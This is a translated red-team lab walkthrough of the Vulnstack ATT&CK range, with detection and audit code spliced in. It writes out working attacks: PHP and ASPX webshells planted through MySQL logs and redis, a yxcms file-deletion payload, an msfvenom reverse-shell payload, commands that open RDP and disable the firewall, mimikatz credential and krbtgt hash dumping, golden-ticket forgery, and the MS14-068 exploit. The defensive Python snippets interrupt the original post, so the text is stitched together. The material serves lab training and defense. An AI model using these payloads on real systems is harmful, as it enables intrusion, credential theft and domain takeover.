ATT&CK Practical Series: Red Team Practice (1)

Environment setup

Download link:
http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

Official description

The Red Team practice series takes real corporate environments as its examples, builds a series of target ranges, and teaches through a combination of exercises, video tutorials and blog posts. This practice environment also fully simulates the ATT&CK attack chain in its construction, forming a complete closed loop. A real APT practice environment will be built later so that readers can grow through practice. Various attack paths can be simulated in this environment; the author's current path is given below. All virtual machines share one password: [email protected]

I. Environment setup
   1. Environment setup and testing
   2. Information collection

II. Vulnerability exploitation
   3. Vulnerability discovery and exploitation
   4. Back-end getshell upload techniques
   5. System information collection
   6. Host password collection

III. Intranet collection
   7. Intranet: continued information collection
   8. Intranet attack posture: information leakage
   9. Intranet attack posture: MS08-067
   10. Intranet attack posture: SMB remote desktop password guessing
   11. Intranet attack posture: Oracle database TNS service vulnerability
   12. Intranet attack posture: RPC DCOM service vulnerability

IV. Lateral movement
   13. Other intranet host ports: file reading
   14. Other intranet host ports: redis
   15. Other intranet host ports: redis getshell
   16. Other intranet host ports: MySQL database
   17. Other intranet host ports: MySQL privilege escalation

V. Building a channel
   18. Other intranet host ports: proxy forwarding

VI. Persistent control
   19. Domain penetration: collecting domain member information
   20. Domain penetration: weak password detection for basic services and deep use of PowerShell
   21. Domain penetration: lateral movement (WMI)
   22. Domain penetration: C2 command execution
   23. Domain penetration: using domain fronting to hide the beacon
   24. Domain penetration: obtaining and using domain controller access

VII. Trace cleanup
   25. Log cleanup

Network topology:

Local environment:

Configure the network and start phpStudy on the Win7 host

Penetration testing section

The web root is just a PHP probe page

NMAP

Directory enumeration

Website backup files

phpinfo
http://192.168.60.170/phpinfo.php

phpmyadmin log getshell

http://192.168.60.170/phpmyadmin/
http://192.168.60.170/phpmyadmin/examples/
http://192.168.60.170/phpmyadmin/setup/
http://192.168.60.170/phpmyadmin/changelog

No other findings for now. Brute-forcing phpmyadmin produced several hits with an empty password, but an empty password could not actually log in.

No permission to read the file

Found a yxcms database in phpmyadmin

Try writing a one-line webshell with INTO OUTFILE:

select '<?php eval($_POST[pwd]); ?>' into outfile 'C:/phpStudy/WWW/shell.php';

Attempted to modify secure_file_priv, but it failed (the variable is read-only at runtime and can only be set at server startup)

show variables like "secure_file_priv";
set global secure_file_priv='';

Write a one-line webshell using the MySQL general_log_file

show variables like 'general%';

Turn on the general_log

set global general_log = 'ON';

Point the general_log file path into the website root directory

set global general_log_file='C:/phpStudy/WWW/shell.php';

Because the general_log records every SQL statement we execute, the one-line webshell is also written into it when we run the select. Since the file suffix was changed to .php, PHP parses the file as soon as it encounters the <?php opening tag.

Visiting it again, PHP reports an error, which confirms the file is being parsed by PHP, but there is a fatal error on line 940

Clear the general_log and try again

set global general_log = 'OFF';
rename table mysql.general_log TO mysql.general_log2;
delete from mysql.general_log2;
show variables like 'general%';
rename table mysql.general_log2 TO mysql.general_log;
set global general_log = 'ON';
set global general_log_file='C:/phpStudy/WWW/shell2.php';
show variables like 'general%';
select '<?php eval($_POST[pwd]);?>';
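As an added example (not from the original post), the following Python flags the statements this technique leaves behind in the MySQL general log or an audit plugin: general_log_file redirected under a web root, INTO OUTFILE to a script, secure_file_priv changes, and a SELECT of a literal carrying a PHP open tag. The web-root list and the sample statements are assumptions constructed for this lab.

```python
import re

# Web roots the server executes scripts from (assumed for this lab;
# C:/phpStudy/WWW is the phpStudy web root shown in the walkthrough).
WEB_ROOTS = ("c:/phpstudy/www", "c:\\phpstudy\\www", "/var/www")
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|aspx?|jsp)$", re.I)
PHP_TAG = re.compile(r"<\?(php|=)", re.I)
# (rule name, regex capturing the file path, report regardless of path)
RULES = [
    ("general_log_file_redirect",
     re.compile(r"set\s+global\s+general_log_file\s*=\s*['\"]([^'\"]+)['\"]", re.I), False),
    ("into_outfile",
     re.compile(r"into\s+(?:out|dump)file\s+['\"]([^'\"]+)['\"]", re.I), False),
    ("secure_file_priv_change",
     re.compile(r"set\s+global\s+secure_file_priv\s*=\s*['\"]([^'\"]*)['\"]", re.I), True),
]

def classify(stmt):
    """Return (rule_name, path) for a suspicious statement, else None."""
    for name, rx, always in RULES:
        m = rx.search(stmt)
        if not m:
            continue
        path = m.group(1)
        if always or path.lower().startswith(WEB_ROOTS) or SCRIPT_EXT.search(path):
            return (name, path)
    # A SELECT of a literal containing a PHP open tag exists only to get that
    # tag into a log or file the web server will later execute.
    if re.match(r"\s*select\s+['\"]", stmt, re.I) and PHP_TAG.search(stmt):
        return ("php_tag_in_select", None)
    return None

def scan(statements):
    findings = []  # (index, finding) pairs
    for i, stmt in enumerate(statements):
        hit = classify(stmt)
        if hit:
            findings.append((i, hit))
    return findings

# Constructed sample mirroring the sequence in the walkthrough above.
SAMPLE = [
    "show variables like 'general%';",
    "set global general_log = 'ON';",
    "set global general_log_file='C:/phpStudy/WWW/shell.php';",
    "select '<?php eval($_POST[pwd]);?>';",
    "select version();",
]
```

A log path under the MySQL data directory is not reported; only paths under a web root, paths with a script extension, and secure_file_priv changes are.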

yxcms

The website leaked the back-end address and a user password, and the password was a weak one.
Searching Baidu for the relevant directory structure found the back-end login page:
http://192.168.60.170/yxcms/index.php?r=admin/index/login

Searched online for yxcms vulnerabilities and reproduced them here

Front-end XSS


Back-end review: once approved in the back end, the content is also displayed on the front end


Write arbitrary files to getshell

Create a new template

The upload path is found in the previously leaked backup file

http://192.168.60.170/yxcms/protected/apps/default/view/default/shell.php.php

Arbitrary file deletion

You need to log in to the back end first; after the request, the page reports that the thumbnail does not exist

Payload: http://sb.com/index.php?r=admin/photo/delpic
POST: picname=…/…/protected/apps/install/install.lock


Post-exploitation stage

Getting the host online in Cobalt Strike (CS)

Run artifact.exe

This password is the default password


Escalate privileges to SYSTEM

Domain controller information collection

View the intranet subnet

The domain controller is generally also the DNS server

whoami, hostname

Query the system architecture and installed software

echo %PROCESSOR_ARCHITECTURE%
wmic product get name,version

Query the domain list and all domain users

net view /domain
net user /domain

Query the time from the domain controller: if the current user is a domain user, this returns the domain controller's current time. It also identifies the primary domain controller, which is generally used as the time server.
Then use net group "domain controllers" /domain to verify which host is the domain controller

net time /domain
net group "domain controllers" /domain

The primary domain controller is owa.god.org


Domain password policy

net accounts /domain

Confirm the domain controller's IP

Information collection and penetration outside the domain

Routing information

arp table

Enable RDP (port 3389)

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

Turn off the firewall while connecting

netsh firewall set opmode disable

Add user


Generate a payload with msfvenom

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.60.129 LPORT=7777 -f exe > shell.exe

Local listener

Upload


Domain penetration

SMB Beacon C2 command execution

Create a listener

Log in with psexec

Obtain a beacon on the domain controller OWA

CS/MSF integration

msf listener

Create a new listener in CS

Add a session and spawn it to msf

Identify the .141 host seen in the earlier arp table

Shell output is garbled; switch the code page

chcp 65001

Add route

run autoroute -s 192.168.52.0/24
run autoroute -p
run get_local_subnets

Also run arp

Port scan .141.
Oracle and redis are mentioned in the environment description, so their ports are added to the scan.

The description of .141 mentions MS08-067, but that exploit does not work; MS17-010 works, but it blue-screens the server.

.138

The .138 domain controller could not be exploited at first, but it succeeded after the firewall was turned off.

Turn off the firewall

netsh advfirewall set allprofiles state off

redis getshell

Redis is actually problematic.
Redis is mentioned in the official description, but it is not accessible by default. I really could not find another approach, so I had to temporarily modify the redis configuration.

127.0.0.1:6379> config set protected-mode no

Related msf redis modules

auxiliary/scanner/redis/file_upload
auxiliary/scanner/redis/redis_login
auxiliary/scanner/redis/redis_server


Port 80 is open on the .138 domain controller target; through the route added earlier it can already be accessed directly

Write a webshell to the physical path through redis.
Redis only needs write permission on the directory for this,
but it is much harder without knowing the physical path.

192.168.52.138:6379> config set dir C:\inetpub\wwwroot\
OK
192.168.52.138:6379> config set dbfilename shell.aspx
OK
192.168.52.138:6379> set x "<% @Page Language='Jscript'%><%eval(Request.Item['pwd'],'unsafe');%>"
OK
192.168.52.138:6379> save
OK
192.168.52.138:6379>
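An added example, not part of the original post: a Python audit of redis.conf for the settings that make the CONFIG SET dir/dbfilename write above possible. The two config fragments and the web-root list are constructed assumptions; on Redis 6+ an ACL denying CONFIG is the modern alternative to rename-command.

```python
WEB_ROOTS = ("c:\\inetpub\\wwwroot", "c:/inetpub/wwwroot", "/var/www")

def parse_conf(text):
    """Map each directive to the list of values seen, in file order."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition(" ")
        conf.setdefault(key.lower(), []).append(value.strip())
    return conf

def last(conf, key, default=""):
    """Value of the final occurrence of a directive (Redis applies the last one)."""
    return conf.get(key, [default])[-1]

def audit(text):
    """Return the weaknesses that let a remote client turn CONFIG SET into a file write."""
    conf = parse_conf(text)
    findings = []
    if last(conf, "protected-mode", "yes").lower() == "no":
        findings.append("protected-mode disabled")
    # With no bind directive Redis listens on every interface.
    if any(a in ("0.0.0.0", "*", "::") for a in last(conf, "bind", "0.0.0.0").split()):
        findings.append("listens on all interfaces")
    if not last(conf, "requirepass").strip('"'):
        findings.append("no password (requirepass unset)")
    renamed = {v.split()[0].upper() for v in conf.get("rename-command", []) if v.split()}
    if "CONFIG" not in renamed:
        findings.append("CONFIG command not renamed or disabled")
    if last(conf, "dir").lower().startswith(WEB_ROOTS):
        findings.append("dump directory is inside a web root")
    return findings

# Constructed fragments: WEAK is the state abused in the walkthrough
# (CONFIG reachable, dir under the IIS root); HARDENED is the corrected form.
WEAK = """
bind 0.0.0.0
protected-mode no
dir C:\\inetpub\\wwwroot\\
"""
HARDENED = """
bind 127.0.0.1
protected-mode yes
requirepass REPLACE-WITH-A-LONG-RANDOM-SECRET
rename-command CONFIG ""
dir /var/lib/redis
"""
```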

Golden ticket

Prerequisites for forging a golden ticket:

  1. Domain name
  2. SID of the domain
  3. Password hash of the domain's krbtgt account (NTLM or aes256_hmac)
  4. A username to impersonate; it can be any user, even a non-existent one

The krbtgt account is the account the domain controller uses to issue tickets. With its credentials, any user in the domain can be forged.

The domain name has been collected earlier: god.org

SID: whoami /user

Domain SID and krbtgt account hash

mimikatz # privilege::debug   # (elevate privileges)
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords   # (dump plaintext passwords and hashes)
mimikatz # lsadump::dcsync /domain:god.org /user:krbtgt   # export the krbtgt password hash
mimikatz # lsadump::dcsync /domain:god.org /all /csv   # export the password hashes of all domain users

SID of the domain: S-1-5-21-2952760202-1353902439-2381784089-500
aes256_hmac: a780c2c18b3287e3448562a36dccb2d57d11fd398b55ce2cd9b128308cef74df
NTLM: 58e91a5ac358d86513ab224312314061

kerberos::golden /domain:<domain name> /sid:<domain SID> /aes256:<aes256_hmac> /user:<any username> /ptt
kerberos::golden /domain:god.org /sid:S-1-5-21-2952760202-1353902439-2381784089-500 /aes256:a780c2c18b3287e3448562a36dccb2d57d11fd398b55ce2cd9b128308cef74df /user:abc /ptt

Forged ticket

CS can also forge tickets

Forged ticket information

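From the defender's side, as an added example that is not part of the original post: a small Python detector over Kerberos audit events (4768 TGT requests and 4769 service-ticket requests) that flags service tickets for accounts absent from the directory, tickets from clients that never requested a TGT, and realm strings that differ from the form the DC writes. The known-user set, the expected realm and the events are constructed assumptions.

```python
# Constructed directory listing; the walkthrough's forged user "abc" is absent.
KNOWN_USERS = {"administrator", "krbtgt"}
EXPECTED_REALM = "GOD.ORG"  # realm as the DC writes it: uppercase FQDN

def detect_forged_tickets(events, known_users=KNOWN_USERS, realm=EXPECTED_REALM):
    """Return [(user, client_ip, reasons)] for suspicious 4769 events."""
    tgt_clients = set()  # (user, ip) pairs that obtained a TGT via 4768
    findings = []
    for e in events:
        key = (e["user"].lower(), e["ip"])
        if e["id"] == 4768:
            tgt_clients.add(key)
            continue
        if e["id"] != 4769:
            continue
        reasons = []
        if key[0] not in known_users:
            reasons.append("account does not exist in the directory")
        # A TGT forged offline and injected with /ptt never goes through AS-REQ,
        # so the DC sees TGS-REQs with no matching 4768. Heuristic only: the
        # real 4768 may simply predate the log window.
        if key not in tgt_clients:
            reasons.append("service ticket without a prior TGT request from this client")
        # Heuristic: a forged ticket carries the realm exactly as typed into
        # /domain, while the DC logs the uppercase FQDN for real tickets.
        if e["realm"] != realm:
            reasons.append(f"realm {e['realm']!r} differs from {realm!r}")
        if reasons:
            findings.append((e["user"], e["ip"], reasons))
    return findings

# Constructed events in the shape of 4768 (TGT request) and 4769 (service
# ticket request), trimmed to the fields the detector needs. The client IP
# is made up inside the lab subnet.
EVENTS = [
    {"id": 4768, "user": "Administrator", "realm": "GOD.ORG", "ip": "192.168.52.143"},
    {"id": 4769, "user": "Administrator", "realm": "GOD.ORG", "ip": "192.168.52.143",
     "service": "cifs/owa.god.org"},
    {"id": 4769, "user": "abc", "realm": "god.org", "ip": "192.168.52.143",
     "service": "cifs/owa.god.org"},
]

if __name__ == "__main__":
    for user, ip, why in detect_forged_tickets(EVENTS):
        print(user, ip, "; ".join(why))
```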

MS14-068

MS14-068 is a privilege escalation vulnerability that allows an ordinary domain user to obtain domain controller privileges. Microsoft's patch for it is KB3011780. Any domain controller from Windows Server 2000 onward that lacks this patch can be exploited.

Access to the domain controller's share is denied

Use MS14-068 to generate a ticket

MS14-068.exe -u <domain user>@<domain controller name> -p <domain user password> -s <domain user SID> -d <domain IP>
MS14-068.exe -u [email protected] -s S-1-5-21-2952760202-1353902439-2381784089-500 -p [email protected] -d 192.168.52.138

Purge the currently cached Kerberos tickets before importing

mimikatz # kerberos::purge
or
klist purge

Import the Kerberos ticket with mimikatz

mimikatz # kerberos::ptc [email protected]
C:\phpStudy\WWW>dir \\owa.god.org\C$